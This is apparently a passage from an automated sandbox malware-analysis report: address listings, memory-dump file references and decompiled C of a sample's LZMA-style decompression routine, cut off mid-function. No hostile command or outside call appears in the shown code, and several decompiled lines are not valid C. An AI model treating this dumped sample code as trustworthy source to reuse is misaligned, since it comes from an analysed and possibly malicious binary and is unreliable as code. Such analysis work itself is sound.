                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075e5
                                                          0x004075eb
                                                          0x004075ed
                                                          0x004075f4
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                          • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                          • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                          • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406FFE() {
                                                          				signed int _t539;
                                                          				unsigned short _t540;
                                                          				signed int _t541;
                                                          				void _t542;
                                                          				signed int _t543;
                                                          				signed int _t544;
                                                          				signed int _t573;
                                                          				signed int _t576;
                                                          				signed int _t597;
                                                          				signed int* _t614;
                                                          				void* _t621;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t621 - 0x40) != 1) {
                                                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                          						_t539 =  *(_t621 - 4) + 0x664;
                                                          						 *(_t621 - 0x58) = _t539;
                                                          						goto L68;
                                                          					} else {
                                                          						 *(__ebp - 0x84) = 8;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t621 - 0x54) = _t614;
                                                          							while(1) {
                                                          								L133:
                                                          								_t540 =  *_t614;
                                                          								_t597 = _t540 & 0x0000ffff;
                                                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          								if( *(_t621 - 0xc) >= _t573) {
                                                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          									 *(_t621 - 0x40) = 1;
                                                          									_t541 = _t540 - (_t540 >> 5);
                                                          									 *_t614 = _t541;
                                                          								} else {
                                                          									 *(_t621 - 0x10) = _t573;
                                                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          								}
                                                          								if( *(_t621 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t621 - 0x6c) == 0) {
                                                          									 *(_t621 - 0x88) = 5;
                                                          									L170:
                                                          									_t576 = 0x22;
                                                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                          									_t544 = 0;
                                                          									L172:
                                                          									return _t544;
                                                          								}
                                                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t542 =  *(_t621 - 0x84);
                                                          								while(1) {
                                                          									 *(_t621 - 0x88) = _t542;
                                                          									while(1) {
                                                          										L1:
                                                          										_t543 =  *(_t621 - 0x88);
                                                          										if(_t543 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                          											case 0:
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t543 =  *( *(_t621 - 0x70));
                                                          												if(_t543 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t547 = _t543 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t578);
                                                          												_push(9);
                                                          												_pop(_t579);
                                                          												_t617 = _t547 / _t578;
                                                          												_t549 = _t547 % _t578 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t612 = _t549 % _t579 & 0x000000ff;
                                                          												 *(_t621 - 0x3c) = _t612;
                                                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                          													L10:
                                                          													if(_t620 == 0) {
                                                          														L12:
                                                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t620 = _t620 - 1;
                                                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                          													} while (_t620 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t621 - 4) != 0) {
                                                          													GlobalFree( *(_t621 - 4));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t621 - 4) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                          												_t45 = _t621 - 0x48;
                                                          												 *_t45 =  *(_t621 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t621 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t555 =  *(_t621 - 0x40);
                                                          												if(_t555 ==  *(_t621 - 0x74)) {
                                                          													L20:
                                                          													 *(_t621 - 0x48) = 5;
                                                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t621 - 0x74) = _t555;
                                                          												if( *(_t621 - 8) != 0) {
                                                          													GlobalFree( *(_t621 - 8));
                                                          												}
                                                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                          												 *(_t621 - 8) = _t543;
                                                          												if(_t543 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                          												 *(_t621 - 0x84) = 6;
                                                          												 *(_t621 - 0x4c) = _t562;
                                                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                          												goto L132;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t621 - 0x6c);
                                                          												if( *(_t621 - 0x6c) == 0) {
                                                          													 *(_t621 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                          												_t67 = _t621 - 0x70;
                                                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                          												if( *(_t621 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t540 =  *_t614;
                                                          												_t597 = _t540 & 0x0000ffff;
                                                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                          												if( *(_t621 - 0xc) >= _t573) {
                                                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                          													 *(_t621 - 0x40) = 1;
                                                          													_t541 = _t540 - (_t540 >> 5);
                                                          													 *_t614 = _t541;
                                                          												} else {
                                                          													 *(_t621 - 0x10) = _t573;
                                                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                          												}
                                                          												if( *(_t621 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												goto L0;
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t258;
                                                          												0 | _t258 = _t258 + _t258 + 9;
                                                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          												goto L75;
                                                          											case 0xa:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xb;
                                                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												L88:
                                                          												__ecx =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												L89:
                                                          												__eax =  *(__ebp - 4);
                                                          												 *(__ebp - 0x80) = 0x15;
                                                          												__eax =  *(__ebp - 4) + 0xa68;
                                                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          												goto L68;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
